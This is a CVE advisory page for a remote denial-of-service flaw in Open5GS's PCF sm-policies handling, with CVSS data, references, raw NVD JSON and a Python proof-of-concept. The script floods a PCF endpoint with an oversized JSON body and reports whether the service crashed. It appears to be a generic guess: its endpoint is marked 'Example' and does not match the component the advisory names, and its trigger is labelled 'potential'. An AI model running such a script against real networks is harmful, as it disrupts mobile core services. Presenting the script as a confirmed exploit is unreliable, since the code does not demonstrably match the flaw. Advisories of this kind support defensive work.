CVE-2026-8222

Description

A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE

Open5GS <= 2.7.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target configuration (Replace with actual vulnerable instance)
target_host = "http://127.0.0.1:7777"
endpoint = "/npcf-policyauthorization/v1/policies" # Example endpoint related to PCF/SM policies

# Malformed payload designed to trigger the crash in pcf_nbsf_management_handle_register
# This payload simulates a boundary condition or specific input structure that the handler fails to process
malformed_payload = {
    "notificationUri": "http://malicious.com/callback",
    "supi": "imsi-999999999999999",
    "invalidData": ["A" * 10000] # Potential buffer overflow or parsing issue trigger
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

def trigger_dos():
    try:
        print(f"[*] Sending exploit payload to {target_host}{endpoint}")
        response = requests.post(target_host + endpoint, data=json.dumps(malformed_payload), headers=headers, timeout=5)
        
        # Check if service is still responsive or if it crashed
        if response.status_code == 500 or response.status_code == 404:
            print("[+] Potential crash triggered or server error returned.")
        else:
            print(f"[-] Server responded with status: {response.status_code}")
            
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused. The service may have crashed (DoS successful).")
    except requests.exceptions.Timeout:
        print("[+] Request timed out. Service may be hanging.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    trigger_dos()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8222/
[4] VulDB https://vuldb.com/cve/CVE-2026-8222
[5] https://github.com/open5gs/open5gs/
[6] https://github.com/open5gs/open5gs/issues/4437
[7] https://vuldb.com/submit/808427
[8] https://vuldb.com/vuln/362439
[9] https://vuldb.com/vuln/362439/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8222", "sourceIdentifier": "[email protected]", "published": "2026-05-10T03:16:08.690", "lastModified": "2026-05-12T17:49:04.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4437", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/submit/808427", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362439", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362439/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}